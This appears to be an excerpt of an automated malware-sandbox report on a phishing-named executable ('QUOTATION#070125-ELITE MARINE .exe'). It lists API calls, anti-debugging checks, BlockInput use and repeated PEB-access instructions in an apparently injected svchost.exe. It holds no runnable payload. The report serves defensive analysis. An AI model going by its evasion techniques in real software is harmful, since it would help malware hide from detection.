              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_006A5C97
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006342DE
              Source: cmdkey.exe, 00000003.00000002.15244350653.000000000316D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
              Source: RAVCpl64.exe, 00000002.00000002.16199147921.000000000059E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000004.00000002.12028192227.0000025D82937000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397088E rdtsc 1_2_0397088E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417AD3 LdrLoadDll,1_2_00417AD3
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006AEAA2 BlockInput,0_2_006AEAA2
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00662622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00662622
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006342DE
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00654CE8 mov eax, dword ptr fs:[00000030h]0_2_00654CE8
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0106CFB0 mov eax, dword ptr fs:[00000030h]0_2_0106CFB0
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0106D010 mov eax, dword ptr fs:[00000030h]0_2_0106D010
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0106B9A0 mov eax, dword ptr fs:[00000030h]0_2_0106B9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A390 mov eax, dword ptr fs:[00000030h]1_2_0395A390
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A390 mov eax, dword ptr fs:[00000030h]1_2_0395A390
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A390 mov eax, dword ptr fs:[00000030h]1_2_0395A390
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D43BA mov eax, dword ptr fs:[00000030h]1_2_039D43BA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D43BA mov eax, dword ptr fs:[00000030h]1_2_039D43BA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC3B0 mov eax, dword ptr fs:[00000030h]1_2_039AC3B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039643D0 mov ecx, dword ptr fs:[00000030h]1_2_039643D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE3DD mov eax, dword ptr fs:[00000030h]1_2_039BE3DD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B43D5 mov eax, dword ptr fs:[00000030h]1_2_039B43D5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E3C0 mov eax, dword ptr fs:[00000030h]1_2_0392E3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E3C0 mov eax, dword ptr fs:[00000030h]1_2_0392E3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E3C0 mov eax, dword ptr fs:[00000030h]1_2_0392E3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C3C7 mov eax, dword ptr fs:[00000030h]1_2_0392C3C7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039363CB mov eax, dword ptr fs:[00000030h]1_2_039363CB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E310 mov eax, dword ptr fs:[00000030h]1_2_0394E310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E310 mov eax, dword ptr fs:[00000030h]1_2_0394E310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E310 mov eax, dword ptr fs:[00000030h]1_2_0394E310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396631F mov eax, dword ptr fs:[00000030h]1_2_0396631F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D630E mov eax, dword ptr fs:[00000030h]1_2_039D630E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968322 mov eax, dword ptr fs:[00000030h]1_2_03968322
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968322 mov eax, dword ptr fs:[00000030h]1_2_03968322
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968322 mov eax, dword ptr fs:[00000030h]1_2_03968322
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E328 mov eax, dword ptr fs:[00000030h]1_2_0392E328
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E328 mov eax, dword ptr fs:[00000030h]1_2_0392E328
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E328 mov eax, dword ptr fs:[00000030h]1_2_0392E328
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A350 mov eax, dword ptr fs:[00000030h]1_2_0396A350
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928347 mov eax, dword ptr fs:[00000030h]1_2_03928347
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928347 mov eax, dword ptr fs:[00000030h]1_2_03928347
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928347 mov eax, dword ptr fs:[00000030h]1_2_03928347
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE372 mov eax, dword ptr fs:[00000030h]1_2_039AE372
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE372 mov eax, dword ptr fs:[00000030h]1_2_039AE372
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE372 mov eax, dword ptr fs:[00000030h]1_2_039AE372
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE372 mov eax, dword ptr fs:[00000030h]1_2_039AE372
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0371 mov eax, dword ptr fs:[00000030h]1_2_039B0371
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0371 mov eax, dword ptr fs:[00000030h]1_2_039B0371
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395237A mov eax, dword ptr fs:[00000030h]1_2_0395237A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E363 mov eax, dword ptr fs:[00000030h]1_2_0396E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E363 mov eax, dword ptr fs:[00000030h]1_2_0396E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E363 mov eax, dword ptr fs:[00000030h]1_2_0396E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E363 mov eax, dword ptr fs:[00000030h]1_2_0396E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E363 mov eax, dword ptr fs:[00000030h]1_2_0396E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E363 mov eax, dword ptr fs:[00000030h]1_2_0396E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E363 mov eax, dword ptr fs:[00000030h]1_2_0396E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E363 mov eax, dword ptr fs:[00000030h]1_2_0396E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE289 mov eax, dword ptr fs:[00000030h]1_2_039AE289
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C2B0 mov ecx, dword ptr fs:[00000030h]1_2_0392C2B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039542AF mov eax, dword ptr fs:[00000030h]1_2_039542AF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039542AF mov eax, dword ptr fs:[00000030h]1_2_039542AF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402F9 mov eax, dword ptr fs:[00000030h]1_2_039402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402F9 mov eax, dword ptr fs:[00000030h]1_2_039402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402F9 mov eax, dword ptr fs:[00000030h]1_2_039402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402F9 mov eax, dword ptr fs:[00000030h]1_2_039402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402F9 mov eax, dword ptr fs:[00000030h]1_2_039402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402F9 mov eax, dword ptr fs:[00000030h]1_2_039402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402F9 mov eax, dword ptr fs:[00000030h]1_2_039402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402F9 mov eax, dword ptr fs:[00000030h]1_2_039402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2E0 mov eax, dword ptr fs:[00000030h]1_2_0393A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2E0 mov eax, dword ptr fs:[00000030h]1_2_0393A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2E0 mov eax, dword ptr fs:[00000030h]1_2_0393A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2E0 mov eax, dword ptr fs:[00000030h]1_2_0393A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2E0 mov eax, dword ptr fs:[00000030h]1_2_0393A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2E0 mov eax, dword ptr fs:[00000030h]1_2_0393A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039382E0 mov eax, dword ptr fs:[00000030h]1_2_039382E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039382E0 mov eax, dword ptr fs:[00000030h]1_2_039382E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039382E0 mov eax, dword ptr fs:[00000030h]1_2_039382E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039382E0 mov eax, dword ptr fs:[00000030h]1_2_039382E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392821B mov eax, dword ptr fs:[00000030h]1_2_0392821B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A200 mov eax, dword ptr fs:[00000030h]1_2_0392A200
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950230 mov ecx, dword ptr fs:[00000030h]1_2_03950230
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0227 mov eax, dword ptr fs:[00000030h]1_2_039B0227
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0227 mov eax, dword ptr fs:[00000030h]1_2_039B0227
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0227 mov eax, dword ptr fs:[00000030h]1_2_039B0227
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A22B mov eax, dword ptr fs:[00000030h]1_2_0396A22B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A22B mov eax, dword ptr fs:[00000030h]1_2_0396A22B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A22B mov eax, dword ptr fs:[00000030h]1_2_0396A22B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934180 mov eax, dword ptr fs:[00000030h]1_2_03934180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934180 mov eax, dword ptr fs:[00000030h]1_2_03934180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934180 mov eax, dword ptr fs:[00000030h]1_2_03934180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039641BB mov ecx, dword ptr fs:[00000030h]1_2_039641BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039641BB mov eax, dword ptr fs:[00000030h]1_2_039641BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039641BB mov eax, dword ptr fs:[00000030h]1_2_039641BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E1A4 mov eax, dword ptr fs:[00000030h]1_2_0396E1A4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E1A4 mov eax, dword ptr fs:[00000030h]1_2_0396E1A4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039401C0 mov eax, dword ptr fs:[00000030h]1_2_039401C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039401C0 mov eax, dword ptr fs:[00000030h]1_2_039401C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039401F1 mov eax, dword ptr fs:[00000030h]1_2_039401F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039401F1 mov eax, dword ptr fs:[00000030h]1_2_039401F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039401F1 mov eax, dword ptr fs:[00000030h]1_2_039401F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A1E3 mov eax, dword ptr fs:[00000030h]1_2_0393A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A1E3 mov eax, dword ptr fs:[00000030h]1_2_0393A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A1E3 mov eax, dword ptr fs:[00000030h]1_2_0393A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A1E3 mov eax, dword ptr fs:[00000030h]1_2_0393A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A1E3 mov eax, dword ptr fs:[00000030h]1_2_0393A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F81EE mov eax, dword ptr fs:[00000030h]1_2_039F81EE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F81EE mov eax, dword ptr fs:[00000030h]1_2_039F81EE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039281EB mov eax, dword ptr fs:[00000030h]1_2_039281EB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960118 mov eax, dword ptr fs:[00000030h]1_2_03960118
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BA130 mov eax, dword ptr fs:[00000030h]1_2_039BA130
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396415F mov eax, dword ptr fs:[00000030h]1_2_0396415F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A147 mov eax, dword ptr fs:[00000030h]1_2_0392A147
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A147 mov eax, dword ptr fs:[00000030h]1_2_0392A147
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A147 mov eax, dword ptr fs:[00000030h]1_2_0392A147
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936179 mov eax, dword ptr fs:[00000030h]1_2_03936179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A093 mov ecx, dword ptr fs:[00000030h]1_2_0392A093
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C090 mov eax, dword ptr fs:[00000030h]1_2_0392C090
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6090 mov eax, dword ptr fs:[00000030h]1_2_039C6090
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04080 mov eax, dword ptr fs:[00000030h]1_2_03A04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04080 mov eax, dword ptr fs:[00000030h]1_2_03A04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04080 mov eax, dword ptr fs:[00000030h]1_2_03A04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04080 mov eax, dword ptr fs:[00000030h]1_2_03A04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04080 mov eax, dword ptr fs:[00000030h]1_2_03A04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04080 mov eax, dword ptr fs:[00000030h]1_2_03A04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04080 mov eax, dword ptr fs:[00000030h]1_2_03A04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039700A5 mov eax, dword ptr fs:[00000030h]1_2_039700A5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60A0 mov eax, dword ptr fs:[00000030h]1_2_039B60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60A0 mov eax, dword ptr fs:[00000030h]1_2_039B60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60A0 mov eax, dword ptr fs:[00000030h]1_2_039B60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60A0 mov eax, dword ptr fs:[00000030h]1_2_039B60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60A0 mov eax, dword ptr fs:[00000030h]1_2_039B60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60A0 mov eax, dword ptr fs:[00000030h]1_2_039B60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60A0 mov eax, dword ptr fs:[00000030h]1_2_039B60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C0F6 mov eax, dword ptr fs:[00000030h]1_2_0392C0F6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC0E0 mov ecx, dword ptr fs:[00000030h]1_2_039BC0E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972010 mov ecx, dword ptr fs:[00000030h]1_2_03972010
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938009 mov eax, dword ptr fs:[00000030h]1_2_03938009
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960044 mov eax, dword ptr fs:[00000030h]1_2_03960044
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6040 mov eax, dword ptr fs:[00000030h]1_2_039B6040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936074 mov eax, dword ptr fs:[00000030h]1_2_03936074
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936074 mov eax, dword ptr fs:[00000030h]1_2_03936074
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov eax, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov eax, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov eax, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov eax, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov eax, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov eax, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov ecx, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039CC7B0 mov eax, dword ptr fs:[00000030h]1_2_039CC7B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039CC7B0 mov eax, dword ptr fs:[00000030h]1_2_039CC7B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039307A7 mov eax, dword ptr fs:[00000030h]1_2_039307A7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E7E0 mov eax, dword ptr fs:[00000030h]1_2_0395E7E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393471B mov eax, dword ptr fs:[00000030h]1_2_0393471B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393471B mov eax, dword ptr fs:[00000030h]1_2_0393471B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395270D mov eax, dword ptr fs:[00000030h]1_2_0395270D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395270D mov eax, dword ptr fs:[00000030h]1_2_0395270D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395270D mov eax, dword ptr fs:[00000030h]1_2_0395270D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952755 mov eax, dword ptr fs:[00000030h]1_2_03952755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952755 mov eax, dword ptr fs:[00000030h]1_2_03952755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952755 mov eax, dword ptr fs:[00000030h]1_2_03952755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952755 mov ecx, dword ptr fs:[00000030h]1_2_03952755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952755 mov eax, dword ptr fs:[00000030h]1_2_03952755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952755 mov eax, dword ptr fs:[00000030h]1_2_03952755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A750 mov eax, dword ptr fs:[00000030h]1_2_0396A750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE750 mov eax, dword ptr fs:[00000030h]1_2_039DE750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960774 mov eax, dword ptr fs:[00000030h]1_2_03960774
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934779 mov eax, dword ptr fs:[00000030h]1_2_03934779
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934779 mov eax, dword ptr fs:[00000030h]1_2_03934779
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03942760 mov ecx, dword ptr fs:[00000030h]1_2_03942760
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938690 mov eax, dword ptr fs:[00000030h]1_2_03938690
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC691 mov eax, dword ptr fs:[00000030h]1_2_039BC691
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F86A8 mov eax, dword ptr fs:[00000030h]1_2_039F86A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F86A8 mov eax, dword ptr fs:[00000030h]1_2_039F86A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C66D0 mov eax, dword ptr fs:[00000030h]1_2_039C66D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C66D0 mov eax, dword ptr fs:[00000030h]1_2_039C66D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE6D0 mov eax, dword ptr fs:[00000030h]1_2_039DE6D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039306CF mov eax, dword ptr fs:[00000030h]1_2_039306CF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA6C0 mov eax, dword ptr fs:[00000030h]1_2_039FA6C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D86C2 mov eax, dword ptr fs:[00000030h]1_2_039D86C2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC6F2 mov eax, dword ptr fs:[00000030h]1_2_039AC6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC6F2 mov eax, dword ptr fs:[00000030h]1_2_039AC6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C6E0 mov eax, dword ptr fs:[00000030h]1_2_0393C6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039566E0 mov eax, dword ptr fs:[00000030h]1_2_039566E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039566E0 mov eax, dword ptr fs:[00000030h]1_2_039566E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04600 mov eax, dword ptr fs:[00000030h]1_2_03A04600
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930630 mov eax, dword ptr fs:[00000030h]1_2_03930630
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960630 mov eax, dword ptr fs:[00000030h]1_2_03960630
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8633 mov esi, dword ptr fs:[00000030h]1_2_039B8633
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8633 mov eax, dword ptr fs:[00000030h]1_2_039B8633
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8633 mov eax, dword ptr fs:[00000030h]1_2_039B8633
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C620 mov eax, dword ptr fs:[00000030h]1_2_0396C620
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396265C mov eax, dword ptr fs:[00000030h]1_2_0396265C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396265C mov ecx, dword ptr fs:[00000030h]1_2_0396265C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396265C mov eax, dword ptr fs:[00000030h]1_2_0396265C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C640 mov eax, dword ptr fs:[00000030h]1_2_0396C640
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C640 mov eax, dword ptr fs:[00000030h]1_2_0396C640
